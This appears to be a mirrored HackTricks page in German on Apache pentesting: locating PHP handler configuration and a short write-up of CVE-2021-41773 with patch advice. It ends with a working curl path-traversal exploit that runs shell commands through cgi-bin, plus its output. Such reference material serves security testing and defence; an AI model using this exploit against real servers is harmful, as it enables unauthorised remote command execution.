mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-22 11:03:24 +00:00
63 lines
4.1 KiB
Markdown
63 lines
4.1 KiB
Markdown
<details>
|
|
|
|
<summary><strong>Lernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Andere Möglichkeiten, HackTricks zu unterstützen:
|
|
|
|
* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
|
|
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
|
|
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.
|
|
|
|
</details>
|
|
|
|
|
|
# Ausführbare PHP-Erweiterungen
|
|
|
|
Überprüfen Sie, welche Erweiterungen der Apache-Server ausführt. Um sie zu suchen, können Sie Folgendes ausführen:
|
|
```bash
|
|
grep -R -B1 "httpd-php" /etc/apache2
|
|
```
|
|
Auch einige Orte, an denen Sie diese Konfiguration finden können, sind:
|
|
```bash
|
|
/etc/apache2/mods-available/php5.conf
|
|
/etc/apache2/mods-enabled/php5.conf
|
|
/etc/apache2/mods-available/php7.3.conf
|
|
/etc/apache2/mods-enabled/php7.3.conf
|
|
```
|
|
# CVE-2021-41773
|
|
|
|
## Beschreibung
|
|
|
|
CVE-2021-41773 ist eine Sicherheitslücke in Apache HTTP Server, die es einem Angreifer ermöglicht, Dateien außerhalb des Web-Verzeichnisses öffentlich zugänglich zu machen. Dies kann zu unbefugtem Zugriff auf sensible Informationen führen.
|
|
|
|
## Auswirkungen
|
|
|
|
Ein Angreifer kann diese Schwachstelle ausnutzen, um auf Dateien zuzugreifen, die normalerweise nicht öffentlich zugänglich sind. Dies kann vertrauliche Informationen wie Konfigurationsdateien, Passwörter oder andere sensible Daten offenlegen.
|
|
|
|
## Empfohlene Maßnahmen
|
|
|
|
Es wird dringend empfohlen, die betroffene Version des Apache HTTP Servers zu aktualisieren und die neuesten Sicherheitspatches zu installieren. Darüber hinaus sollten Zugriffsbeschränkungen und Berechtigungen für Dateien und Verzeichnisse sorgfältig überprüft werden, um sicherzustellen, dass sensible Informationen nicht öffentlich zugänglich sind.
|
|
|
|
## Weitere Informationen
|
|
|
|
Weitere Informationen zu CVE-2021-41773 finden Sie in der offiziellen CVE-Datenbank: [CVE-2021-41773](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773)
|
|
```bash
|
|
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
|
|
uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
|
Linux
|
|
```
|
|
<details>
|
|
|
|
<summary><strong>Lernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Andere Möglichkeiten, HackTricks zu unterstützen:
|
|
|
|
* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
|
|
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
|
|
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.
|
|
|
|
</details>
|